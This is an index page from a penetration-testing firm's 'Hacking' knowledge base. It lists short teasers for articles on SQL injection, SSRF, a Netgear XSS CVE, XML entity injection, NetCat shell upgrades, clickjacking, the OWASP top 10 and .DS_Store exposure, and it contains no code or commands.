Knowledge base: Hacking

In this section we share our knowledge about hacking.


Blind SQL Injection

With blind SQL injections, an attacker can extract information from the database without the application returning a response.

What is Server-side request forgery (SSRF)?

Server side request forgery is een aanval waarbij de server een request doet die het niet zou moeten doen.

CVE-2016-7941 – XSS in Netgear ProSAFE switches

A tale about the discovery of CVE-2016-7941, XSS in Netgear ProSAFE switches, which was discovered quite some time.

Entity injection

Entity injection attacks can attack applications and cause data leaks. This happens when the XML parser is incorrectly configured.
reverse tcp shell

Upgrade NetCat shell

By default, a NetCat shell is limited and prone to errors. With a few simple commands it can be upgraded to a fully interactive shell.
clickjacking

What is clickjacking?

Clickjacking, sometimes called "UI redressing", is a way of stealing a well placed click from a victim. The goal of the attack is to trick a user to perform an action without the consent of a user, which benefits the attacker. Clickjacking is usually combined with social engineering and security flaws.

OWASP top 10

OWASP is an organization committed to a safer world. This organization periodically publishes a list of the 10 most common vulnerabilities in websites, the OWASP top 10. This list gives you an idea of ​​what CyberAnt pays attention to when we test your website.

The risk of .DS_Store

MacOS creates a hidden file called .DS_Store in some cases. In this article, we explain what the risks are when this file accidentally ends up in the wrong place and how this can be prevented.